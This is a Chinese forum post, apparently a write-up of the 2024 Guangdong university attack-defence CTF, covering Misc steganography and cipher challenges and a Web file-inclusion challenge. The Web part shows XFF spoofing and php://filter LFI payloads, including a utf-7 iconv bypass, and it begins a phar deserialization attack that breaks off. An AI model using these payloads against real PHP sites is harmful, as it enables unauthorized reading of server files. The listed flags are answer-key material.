ToB企服应用市场:ToB评测及商务社交产业平台

标题: 2024广东大学生攻防大赛WP [打印本页]

作者: 没腿的鸟    时间: 2024-5-20 00:38
标题: 2024广东大学生攻防大赛WP
Misc

猜一猜

题目描述:
你们想要的flag就在压缩包里面。
压缩包文件名 解密

解压密码为a1478520
然后修改flag.png文件头

得到

扫描二维码之后
  1. ❀❁❀❇❀✼❀❂✿❆✿✽❁❀✿✾❂❅✿❄❂❉❀✿❂❆❀❃❀✿❂❆✿❀❁✾✻✿❁❁❀❁❂❊✻❂✿❈=
复制代码
花朵解密
https://www.qqxiuzi.cn/bianma/wenbenjiami.php?s=huaduo

得到flag
  1. flag{rUsJyNdKhdKuS4VfO7}
复制代码
要的就在这

题目描述:
你要的在这里

用010editor打开

上面那个是定积分,解出来是π
然后6是什么呢,推测是3.1415
然后用stegpy解密
  1. >python steg.py misc.png -p
  2. Enter password (will not be echoed):
  3. 3557736c7371495153424738633644326d352f4b5277672b36676a6d3174723144513855794a556d495a733dk:luckyone
复制代码
  1. 3557736c7371495153424738633644326d352f4b5277672b36676a6d3174723144513855794a556d495a733d
  2. 这一串十六进制转字符
  3. 5WslsqIQSBG8c6D2m5/KRwg+6gjm1tr1DQ8UyJUmIZs=
  4. k:luckyone
复制代码

flag{believe_you_are_lucky}
Web

消失的flag

题目描述:
flag就隐藏再某个文件里面,看看能不能包含出来 。
访问

推测是XFF,添加:x-forwarded-for:127.0.0.1

File is NUll
文件包含弊端
  1. ?file=/flag
复制代码

用另一种方法
  1. ?file=php://filter/read=convert.base64-encode/resource=/flag
复制代码
也不可
最后试出
  1. ?file=php://filter/convert.iconv.utf-8.utf-7/resource=/flag
复制代码
df4083ae2869462cad0d002533f6cbf7
unserialize_web

同事给我了一个反序列话的源码,在线求助 !
看这篇文章有了灵感
https://blog.csdn.net/qq_53460654/article/details/121889104
https://pankas.top/2022/08/04/php(phar)反序列化弊端及各种绕过姿势/#phar反序列化
首先扫一下目录发现/www.tar.gz
生成.phar
[code]




欢迎光临 ToB企服应用市场:ToB评测及商务社交产业平台 (https://dis.qidao123.com/) Powered by Discuz! X3.4